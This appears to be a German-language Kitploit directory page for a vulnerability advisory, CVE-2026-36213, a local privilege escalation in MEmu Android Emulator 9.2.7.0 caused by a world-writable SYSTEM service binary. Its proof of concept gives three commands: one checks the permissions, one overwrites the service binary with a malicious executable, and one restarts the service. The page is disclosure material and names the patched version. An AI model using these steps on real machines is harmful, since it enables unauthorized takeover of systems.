Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-36213 — CVE-2026-36213 | Local Privilege Escalation in MEmu Android Emulator 9.2.7.0 via Insecure Service Binary Permissions | Patched in 9.3.2 | Kitploit
Tools/GitHubGitHub/sec-zone/cve-2026-36213
Privilege EscalationVulnerability AnalysisExploitationPenetration TestingLearning & EducationBinary Exploitation
GitHubsec-zone/cve-2026-36213

CVE-2026-36213

CVE-2026-36213 | Local Privilege Escalation in MEmu Android Emulator 9.2.7.0 via Insecure Service Binary Permissions | Patched in 9.3.2

Repository anzeigen
51vor 2 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-36213

CVE-2026-36213 | Lokale Privilegienausweitung im MEmu Android Emulator 9.2.7.0 aufgrund unsicherer Berechtigungen der Dienstbinärdatei | Behoben in 9.3.2

CVE-2026-36213 — MEmu Android Emulator 9.2.7.0 LPE

CVE CVSS Status Platform

Zusammenfassung

Eine Schwachstelle zur lokalen Rechteausweitung (LPE) im MEmu Android Emulator 9.2.7.0.
Der Dienst MEmuSVC läuft als NT AUTHORITY\SYSTEM, während seine Binärdatei von jedem lokalen Benutzer beschreibbar ist, was eine vollständige Systemkompromittierung ermöglicht.

FeldDetails
CVECVE-2026-36213
ProduktMEmu Android Emulator (MicroVirt)
Betroffene Version9.2.7.0 und früher
Behobene Version9.3.2
CWECWE-732 / CWE-269
CVSS v3.17.8 HIGH AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
ATT&CKT1574.010

Schwachstelle

MEmuService.exe ist als Windows-Dienst auf SYSTEM-Ebene mit unsicheren NTFS-Berechtigungen installiert:

root@kitploit:~
icacls "C:\Program Files\Microvirt\MEmu\MemuService.exe"

BUILTIN\Users:(F)   ← Any local user has Full Control
Everyone:(F)        ← World-writable binar

Proof of Concept

:: Schritt 1 - Überprüfen der anfälligen Berechtigungen

root@kitploit:~
icacls "C:\Program Files\Microvirt\MEmu\MemuService.exe"

:: Schritt 2 - Binärdatei ersetzen (als Benutzer mit niedrigen Rechten)

root@kitploit:~
copy malicious.exe "C:\Program Files\Microvirt\MEmu\MemuService.exe" /Y

:: Schritt 3 - Dienst neu starten

root@kitploit:~
sc stop MEmuSVC && sc start MEmuSVC

:: Ergebnis: malicious.exe läuft als NT AUTHORITY\SYSTEM

Erkennungsskript

Verfügbar unter: https://github.com/sec-zone/Hijack-service-binaries

Haftungsausschluss

Diese Forschung wurde zu Bildungszwecken im Rahmen einer verantwortungsvollen Offenlegungspolitik durchgeführt.
Der Autor übernimmt keine Verantwortung für den Missbrauch dieser Informationen.

Forscher

Name: Mohammad Hossein Ashofte Yazdi
Linkedin: https://www.linkedin.com/in/seczone64
Twitter: @sec_zone64
Email: [email protected]

Tool herunterladen